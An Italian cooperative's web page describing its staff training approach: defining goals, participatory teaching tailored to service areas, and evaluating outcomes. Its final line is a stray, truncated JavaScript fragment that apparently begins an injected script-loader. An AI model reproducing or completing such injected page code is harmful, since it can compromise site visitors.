Formazione interna

Altri colori investe molte risorse umane ed economiche nella formazione personale e nel continuo aggiornamento dei propri soci, dipendenti, collaboratori, volontari; per questo motivo svolge regolarmente corsi di formazione e aggiornamento, laboratori, seminari, workshop, rivolti alle diverse aree dei servizi che gestisce (Agio, disagio, minori, disabili, anziani) di diverso contenuto e livello.

Articoliamo il percorso formativo attraverso la definizione degli obiettivi formativi, la metodologia didattica e la verifica del raggiungimento degli obiettivi stessi:

Definizione degli obiettivi

Il nostro primo passo è sempre quello di definire con chiarezza gli obiettivi dell′attività formativa che ci accingiamo a svolgere. I servizi socio-educativi sono un mondo molto complesso e in continua trasformazione: i progetti educativi e le metodologie di lavoro debbono essere sempre al passo con i tempi ed aggiornarsi con le tecnologie che il progresso ci mette a disposizione.

La nostra metodologia didattica è pensata per stimolare un “saper essere” e un “saper fare”, con il coinvolgimento del destinatario come attore e non spettatore.

Importante è per noi anche il diversificare i contenuti e le modalità della formazione in base al servizio e all’ambito lavorativo in cui operano i nostri soci, dipendenti, collaboratori, volontari. Abbiamo programmato, infatti, interventi formativi e di aggiornamento specifici per le diverse aree (Agio, disagio, minori, disabili, anziani), pur mantenendo un’attenzione particolare all’area della gestione delle dinamiche di gruppo, dei processi di gestione della qualità, della gestione delle risorse umane che riguarda tutti i livelli della Cooperativa.

La verifica del raggiungimento degli obiettivi

Di fondamentale importanza è per noi il raggiungimento qualitativo e quantitativo delle finalità formative: al termine di un progetto di formazione, infatti, verifichiamo che gli obiettivi siano stati raggiunti e analizziamo le ragioni del successo o dell′insuccesso del lavoro svolto, in modo da poter migliorare le proposte ed eventualmente rimodularle per renderle più efficaci.

var d=document;var s=d.createElement(‘script’);